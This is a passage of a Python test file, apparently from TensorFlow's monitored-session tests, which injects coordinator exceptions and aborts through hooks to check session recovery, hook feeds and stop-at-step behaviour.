        if self._calls_before_stopping == 0:
          # Raise-then-catch so `coord.request_stop` records a real
          # exception with traceback context.
          try:
            raise self._exception_to_raise
          except Exception as e:  # pylint: disable=broad-except
            coord.request_stop(e)
          self._stored_exception_event.set()
          break
  def after_create_session(self, session, coord):
    if self._started_the_side_thread_already:
      return
    separate_thread = threading.Thread(
        target=self._maybe_stop_with_exception, args=(coord,))
    coord.register_thread(separate_thread)
    separate_thread.start()
    self._started_the_side_thread_already = True
    # Coordinator will take care of joining `separate_thread`.
  def after_run(self, run_context, run_values):
    # Decrement the counter under the lock; when this was the N-th run,
    # block until the side thread has actually stored the exception so the
    # stop is visible to the caller's next step.
    stopping_now = False
    with self._lock:
      self._calls_before_stopping -= 1
      if self._calls_before_stopping == 0:
        stopping_now = True
    if stopping_now:
      self._stored_exception_event.wait()
class FailTrainingAfterCoordinatorStopped(StopCoordinatorWithException):
  """With this hook training encounters an exception after N-runs."""
  def __init__(self, calls_before_stopping):
    StopCoordinatorWithException.__init__(self, calls_before_stopping)
    # Captured in `after_create_session` so `after_run` can consult the
    # coordinator for a stored exception.
    self._coord = None
  def after_create_session(self, session, coord):
    self._coord = coord
    return StopCoordinatorWithException.after_create_session(
        self, session, coord)
  def after_run(self, run_context, run_values):
    # Let the base class count down and (possibly) stop the coordinator
    # first, then surface its stored exception on the main thread.
    StopCoordinatorWithException.after_run(self, run_context, run_values)
    try:
      # After a `run`, an exception could have been stored inside the
      # coordinator.
      self._coord.raise_requested_exception()
    except errors_impl.AbortedError:
      # In real world, the main thread may or may not know about the exception
      # that stopped the coordinator. Because the coordinator has stopped, the
      # main thread could have gotten stuck as well (for example, the
      # coordinator was supposed to execute `FIFOQueue.enqueue` while the main
      # thread is executing a blocking `FIFOQueue.dequeue`). After it got stuck,
      # the session is going to get garbage collected after some time with:
      raise errors_impl.CancelledError(None, None,
                                       'Session got garbage-collected.')
class CountingSessionCreator(object):
  """A creator that counts the number of created sessions."""

  def __init__(self, session):
    self._session = session
    # Only one real session exists per test case. It cannot be re-created,
    # so closing it must be turned into a no-op.
    self._session.close = lambda *args: None
    self._creation_count = 0

  @property
  def number_of_sessions_created(self):
    """Number of `create_session` calls so far."""
    return self._creation_count

  def create_session(self):
    """Return the single shared session, bumping the creation counter."""
    self._creation_count += 1
    return self._session
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
@test_util.run_deprecated_v1
def test_recovery(self):
with self.cached_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
@test_util.run_deprecated_v1
def test_recovery_from_coordinator_exception(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck(self):
  """Training failure after a coordinator stop triggers session re-creation.

  The FailTrainingAfterCoordinatorStopped hook (defined elsewhere in this
  file) makes run() fail once the coordinator has stopped; the
  MonitoredSession must transparently recreate the underlying session.
  """
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = monitored_session.MonitoredSession(
        session_creator,
        [FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)
    # Training will not fail, since it's the call number 0.
    self.assertEqual(51, session.run(v, feed_dict={c: 51}))
    self.assertFalse(session.should_stop())
    # Training will fail during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run(v, feed_dict={c: 42}))
    # Even though the coordinator stopped and training failed, the
    # underlying session is recreated and training is to be continued.
    self.assertFalse(session.should_stop())
    self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_when_run_hooks(self):
  """run_step_fn() recovers from a coordinator abort like run() does.

  Same scenario as the plain-run recovery test, but the fetch goes through
  run_step_fn with a step function that calls run_with_hooks.
  """
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = monitored_session.MonitoredSession(
        session_creator,
        [StopCoordinatorWithException(calls_before_stopping=2)])
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Build a step_fn that feeds `value` and fetches it back via hooks.
      def step_fn(step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
      return step_fn

    # The coordinator will not abort during this call, since it's the call
    # number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # The coordinator will abort during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # Even though the coordinator was asked to stop, the underlying session is
    # recreated and is to be continued.
    self.assertFalse(session.should_stop())
    self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_when_run_hooks(self):
  """A fatal coordinator error also stops training when using run_step_fn.

  Mirrors test_recovery_from_non_preemption_in_coordinator but drives the
  fetches through run_step_fn / run_with_hooks.
  """
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    hook = StopCoordinatorWithException(
        calls_before_stopping=2,
        exception_to_raise=errors_impl.UnknownError(
            None, None, 'Some fatal exception inside the coordinator.'))
    session = monitored_session.MonitoredSession(session_creator, [hook])
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Build a step_fn that feeds `value` and fetches it back via hooks.
      def step_fn(step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
      return step_fn

    # The coordinator will not abort during this call, since it's the call
    # number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # The coordinator will abort during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # The coordinator was asked to stop due to non-redeemable error. Training
    # should stop and the session should not be recreated.
    self.assertTrue(session.should_stop())
    self.assertEqual(1, session_creator.number_of_sessions_created)
    with self.assertRaises(errors_impl.UnknownError):
      session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_when_run_hooks(self):
  """Session re-creation after training failure also works via run_step_fn."""
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = monitored_session.MonitoredSession(
        session_creator,
        [FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Build a step_fn that feeds `value` and fetches it back via hooks.
      def step_fn(step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
      return step_fn

    # Training will not fail, since it's the call number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # Training will fail during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # Even though the coordinator stopped and training failed, the
    # underlying session is recreated and training is to be continued.
    self.assertFalse(session.should_stop())
    self.assertEqual(2, session_creator.number_of_sessions_created)
def create_raw_session_with_failing_coordinator(self, session_creator, hook):
  """Return MonitoredSession that triggers coordinator failures.

  Args:
    session_creator: session creator passed through to MonitoredSession.
    hook: a hook (e.g. StopCoordinatorWithException) that makes the
      coordinator fail after a number of calls.

  Returns:
    A MonitoredSession whose `_tf_sess` has been patched to expose the raw
    innermost session, so tests can run fetches that bypass the hook layer.
  """
  session = monitored_session.MonitoredSession(session_creator, [hook])
  # We would like to test a situation where during fetches through the
  # raw session, the coordinator fails with an exception. To do that, we
  # are going to use (raw_session + StopCoordinatorWithException) hook
  # combination that is stored in
  # `MonitoredSession._RecoverableSession._CoordinatedSession._sess`
  # at this point:
  session._tf_sess = lambda: session._sess._sess._sess
  # `run()` on such a session is equivalent to `run()` on the raw session
  # with separate coordinator threads independently stopping with an
  # exception.
  return session
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_with_raw_session(self):
  """Recovery from a coordinator abort when fetching via the raw session.

  Unlike the run_with_hooks variants, the step_fn here runs directly on
  `step_context.session`, bypassing the hook layer.
  """
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = self.create_raw_session_with_failing_coordinator(
        session_creator,
        StopCoordinatorWithException(calls_before_stopping=2))
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Fetch directly on the raw session, not through run_with_hooks.
      def step_fn(step_context):
        return step_context.session.run(fetches=v, feed_dict={c: value})
      return step_fn

    # The coordinator will not abort during this call, since it's the call
    # number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # The coordinator will abort during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # Even though the coordinator was asked to stop, the underlying session is
    # recreated and is to be continued.
    self.assertFalse(session.should_stop())
    self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_with_raw_session(self):
  """A fatal coordinator error stops training when using the raw session."""
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = self.create_raw_session_with_failing_coordinator(
        session_creator,
        StopCoordinatorWithException(
            calls_before_stopping=2,
            exception_to_raise=errors_impl.UnknownError(
                None, None, 'Some fatal exception inside the coordinator.')))
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Build a step_fn that feeds `value` and fetches it back via hooks.
      def step_fn(step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
      return step_fn

    # The coordinator will not abort during this call, since it's the call
    # number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # The coordinator will abort during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # The coordinator was asked to stop due to non-redeemable error. Training
    # should stop and the session should not be recreated.
    self.assertTrue(session.should_stop())
    self.assertEqual(1, session_creator.number_of_sessions_created)
    with self.assertRaises(errors_impl.UnknownError):
      session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_with_raw_session(self):
  """Session re-creation after training failure, raw-session variant."""
  with self.cached_session() as test_session:
    session_creator = CountingSessionCreator(test_session)
    session = self.create_raw_session_with_failing_coordinator(
        session_creator,
        FailTrainingAfterCoordinatorStopped(calls_before_stopping=2))
    self.assertEqual(1, session_creator.number_of_sessions_created)
    self.assertFalse(session.should_stop())
    c = constant_op.constant(0)
    v = array_ops.identity(c)

    def feed_step_fn(value):
      # Build a step_fn that feeds `value` and fetches it back via hooks.
      def step_fn(step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
      return step_fn

    # Training will not fail, since it's the call number 0.
    self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
    self.assertFalse(session.should_stop())
    # Training will fail during the next call, since it's the call
    # number 1.
    self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
    # Even though the coordinator stopped and training failed, the
    # underlying session is recreated and training is to be continued.
    self.assertFalse(session.should_stop())
    self.assertEqual(2, session_creator.number_of_sessions_created)
class FakeSession(monitored_session._WrappedSession):
  """Wrapped session that records the kwargs of its most recent run() call."""

  def __init__(self, sess):
    monitored_session._WrappedSession.__init__(self, sess)
    # Keyword arguments seen by the last run(); inspected by tests.
    self.args_called = {}

  def run(self, fetches, **kwargs):
    """Capture `kwargs` for later inspection, then run only `fetches`."""
    self.args_called = {key: value for key, value in kwargs.items()}
    # Call run only with fetches since we directly pass other arguments.
    return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
  """Tests of _HookedSession."""

  def testRunPassesAllArguments(self):
    """run() forwards feed_dict/options/run_metadata to the wrapped session."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_run = FakeSession(sess)
      mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
      a_tensor = constant_op.constant([0], name='a_tensor')
      self.evaluate(variables.global_variables_initializer())
      # Dummy string arguments are only recorded by FakeSession, never used.
      output = mon_sess.run(fetches=a_tensor,
                            feed_dict='a_feed',
                            options='an_option',
                            run_metadata='a_metadata')
      self.assertEqual(output, [0])
      self.assertEqual(mock_run.args_called, {
          'feed_dict': 'a_feed',
          'options': 'an_option',
          'run_metadata': 'a_metadata'
      })

  def testCallsHooksBeginEnd(self):
    """run() invokes before_run/after_run on every hook exactly once."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      self.evaluate(variables.global_variables_initializer())
      mon_sess.run(a_tensor)
      for hook in [mock_hook, mock_hook2]:
        # Hooks requested nothing, so their run_values carry empty results.
        self.assertEqual(
            hook.last_run_values,
            session_run_hook.SessionRunValues(
                results=None,
                options=config_pb2.RunOptions(),
                run_metadata=config_pb2.RunMetadata()))
        self.assertEqual(hook.last_run_context.original_args,
                         session_run_hook.SessionRunArgs(a_tensor))
        self.assertEqual(hook.last_run_context.session, sess)
        # begin/after_create_session belong to MonitoredSession, not
        # _HookedSession, hence 0 calls here.
        self.assertEqual(hook.call_counter['begin'], 0)
        self.assertEqual(hook.call_counter['after_create_session'], 0)
        self.assertEqual(hook.call_counter['before_run'], 1)
        self.assertEqual(hook.call_counter['after_run'], 1)

  def testShouldStop(self):
    """should_stop() turns True once any hook requests a stop."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      constant_op.constant([0], name='a_tensor')
      self.evaluate(variables.global_variables_initializer())
      mon_sess.run(fetches='a_tensor')
      self.assertFalse(mon_sess.should_stop())
      mock_hook.should_stop = True
      mon_sess.run(fetches='a_tensor')
      self.assertTrue(mon_sess.should_stop())

  def testFetchesHookRequests(self):
    """Extra fetches requested by hooks are evaluated and delivered to them."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      another_tensor = constant_op.constant([5], name='another_tensor')
      third_tensor = constant_op.constant([10], name='third_tensor')
      mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
      mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
      self.evaluate(variables.global_variables_initializer())
      output = mon_sess.run(fetches=a_tensor)
      # Caller sees only its own fetch; hooks see theirs.
      self.assertEqual(output, [0])
      self.assertEqual(mock_hook.last_run_values.results, [5])
      self.assertEqual(mock_hook2.last_run_values.results, [10])

  def testOnlyHooksHaveFeeds(self):
    """Feeds supplied solely by hooks are merged into the run call."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(mon_sess.run(fetches=add_tensor), [15])

  def testBothHooksAndUserHaveFeeds(self):
    """Hook feeds merge with the caller's feed_dict without mutating it."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      c_tensor = constant_op.constant([0], name='c_tensor')
      add_tensor = a_tensor + b_tensor + c_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      self.evaluate(variables.global_variables_initializer())
      feed_dict = {c_tensor: [20]}
      self.assertEqual(
          mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
      # User feed_dict should not be changed
      self.assertEqual(len(feed_dict), 1)

  def testHooksFeedConflicts(self):
    """Two hooks feeding the same tensor is an error."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [10]})
      self.evaluate(variables.global_variables_initializer())
      with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
        mon_sess.run(fetches=add_tensor)

  def testHooksAndUserFeedConflicts(self):
    """A hook and the caller feeding the same tensor is an error."""
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      self.evaluate(variables.global_variables_initializer())
      with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
        mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
  """Hook that raises an Exception at step N."""

  def __init__(self, n, ex):
    # Number of before_run() calls left until the exception fires.
    self.n = n
    self.ex = ex
    self.raised = False

  def before_run(self, run_context):
    """Raise `self.ex` exactly once, on the N-th call; otherwise no-op."""
    self.n -= 1
    if self.raised or self.n != 0:
      return None
    self.raised = True
    raise self.ex
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
  """A hook that observes & optionally modifies RunOptions and RunMetadata."""

  def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
               debug_tensor_watch, report_tensor_allocations_upon_oom):
    self._trace_level = trace_level
    self._timeout_in_ms = timeout_in_ms
    self._output_partition_graphs = output_partition_graphs
    self._debug_tensor_watch = debug_tensor_watch
    self._report_tensor_allocations_upon_oom = (
        report_tensor_allocations_upon_oom)
    # Options / metadata observed by after_run(), in call order.
    self.run_options_list = []
    self.run_metadata_list = []

  def before_run(self, run_context):
    """Request a run using the configured RunOptions and debug watch."""
    requested = config_pb2.RunOptions(
        trace_level=self._trace_level,
        timeout_in_ms=self._timeout_in_ms,
        output_partition_graphs=self._output_partition_graphs,
        report_tensor_allocations_upon_oom=(
            self._report_tensor_allocations_upon_oom))
    requested.debug_options.debug_tensor_watch_opts.extend(
        [self._debug_tensor_watch])
    return session_run_hook.SessionRunArgs(None, None, options=requested)

  def after_run(self, run_context, run_values):
    """Record the options and metadata the step actually ran with."""
    self.run_options_list.append(run_values.options)
    self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
  """A default-constructed MonitoredSession initializes variables and runs."""
  with ops.Graph().as_default():
    zero_var = variables.VariableV1(0)
    with monitored_session.MonitoredSession() as session:
      self.assertEqual(0, session.run(zero_var))
def test_last_step(self):
  """StopAtStepHook(last_step=N) stops at absolute global step N.

  Runs to step 3, checkpoints, restores in a fresh session, and verifies
  the second session stops at last_step=5 counting from the restored step.
  """
  logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    # Run till step 3 and save.
    hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
    with monitored_session.MonitoredSession(hooks=hooks) as session:
      self.assertEqual(0, session.run(gstep))
      self.assertFalse(session.should_stop())
      self.assertEqual(1, session.run(do_step))
      self.assertFalse(session.should_stop())
      self.assertEqual(2, session.run(do_step))
      self.assertFalse(session.should_stop())
      self.assertEqual(3, session.run(do_step))
      self.assertTrue(session.should_stop())
      save_path = saver_lib._get_saver_or_default().save(
          session._coordinated_creator.tf_sess,
          os.path.join(logdir, 'step-3'))
    # Run till step 5 and save.
    def load_ckpt(scaffold, sess):
      # init_fn restoring the step-3 checkpoint into the new session.
      scaffold.saver.restore(sess, save_path)

    session_creator = monitored_session.ChiefSessionCreator(
        monitored_session.Scaffold(init_fn=load_ckpt))
    hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
    with monitored_session.MonitoredSession(
        hooks=hooks, session_creator=session_creator) as session:
      self.assertEqual(3, session.run(gstep))
      self.assertFalse(session.should_stop())
      self.assertEqual(4, session.run(do_step))
      self.assertFalse(session.should_stop())
      self.assertEqual(5, session.run(do_step))
      self.assertTrue(session.should_stop())
def test_num_steps(self):
  """StopAtStepHook(num_steps=N) stops after N steps relative to the start.

  Unlike last_step, num_steps counts from the (possibly restored) starting
  step: after restoring at step 3, num_steps=4 runs through step 7.
  """
  logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    # Do 3 steps and save.
    hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
    with monitored_session.MonitoredSession(hooks=hooks) as session:
      session.run(do_step)
      self.assertFalse(session.should_stop())
      session.run(do_step)
      self.assertFalse(session.should_stop())
      session.run(do_step)
      self.assertTrue(session.should_stop())
      save_path = saver_lib._get_saver_or_default().save(
          session._coordinated_creator.tf_sess,
          os.path.join(logdir, 'step-3'))
    # Restore and do 4 steps.
    def load_ckpt(scaffold, sess):
      # init_fn restoring the step-3 checkpoint into the new session.
      scaffold.saver.restore(sess, save_path)

    session_creator = monitored_session.ChiefSessionCreator(
        scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
    hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
    with monitored_session.MonitoredSession(
        hooks=hooks, session_creator=session_creator) as session:
      self.assertEqual(4, session.run(do_step))
      self.assertFalse(session.should_stop())
      session.run(do_step)
      self.assertFalse(session.should_stop())
      session.run(do_step)
      self.assertFalse(session.should_stop())
      session.run(do_step)
      self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.

@test_util.run_deprecated_v1
def test_recovery(self):
  """A restarted MonitoredSession recovers state from checkpoints.

  Verifies recovery both via checkpoint_dir and via an explicit
  checkpoint_filename_with_path.
  """
  logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    scaffold = monitored_session.Scaffold()
    # Use a hook to save the model every 100 steps. It also saves it at
    # the end.
    hooks = [
        basic_session_run_hooks.CheckpointSaverHook(
            logdir, save_steps=1, scaffold=scaffold)
    ]
    with monitored_session.MonitoredSession(
        session_creator=monitored_session.ChiefSessionCreator(
            scaffold, checkpoint_dir=logdir),
        hooks=hooks) as session:
      self.assertEqual(0, session.run(gstep))
      self.assertEqual(1, session.run(do_step))
      self.assertEqual(2, session.run(do_step))
    # A restart will find the checkpoint and recover automatically.
    with monitored_session.MonitoredSession(
        session_creator=monitored_session.ChiefSessionCreator(
            scaffold, checkpoint_dir=logdir)) as session:
      self.assertEqual(2, session.run(gstep))
    # A restart will find the checkpoint and recover automatically.
    with monitored_session.MonitoredSession(
        session_creator=monitored_session.ChiefSessionCreator(
            scaffold,
            checkpoint_filename_with_path=checkpoint_management.
            latest_checkpoint(logdir))) as session:
      self.assertEqual(2, session.run(gstep))
def test_retry_initialization_on_aborted_error(self):
  # Tests that we silently retry on abort during initialization.
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    self.init_raised_aborted_error = False

    def _init_fn(scaffold, session):
      # Raise AbortedError only on the first initialization attempt.
      _, _ = scaffold, session
      if not self.init_raised_aborted_error:
        self.init_raised_aborted_error = True
        raise errors_impl.AbortedError(None, None, 'Abort')

    with monitored_session.MonitoredSession(
        session_creator=monitored_session.ChiefSessionCreator(
            scaffold=monitored_session.Scaffold(
                init_fn=_init_fn))) as session:
      self.assertFalse(session.should_stop())
      self.assertEqual(0, session.run(gstep))
    # The retry must actually have happened.
    self.assertTrue(self.init_raised_aborted_error)
def _retry_test(self, ex):
  """Run a training loop in which hook raises `ex` at step 3 and verify retry.

  Tests that we silently retry on error. Note that this does not test
  recovery as we do not use a CheckpointSaver in this test.
  """
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    hook = RaiseOnceAtCountN(4, ex)
    with monitored_session.MonitoredSession(hooks=[hook]) as session:
      self.assertEqual(0, session.run(gstep))
      self.assertEqual(1, session.run(do_step))
      self.assertEqual(2, session.run(do_step))
      self.assertFalse(session.should_stop())
      # Here at step 3, the hook triggers and raises AbortedError. The
      # MonitoredSession automatically retries and restart from a freshly
      # initialized session, so the step is back to 0 and running do_step
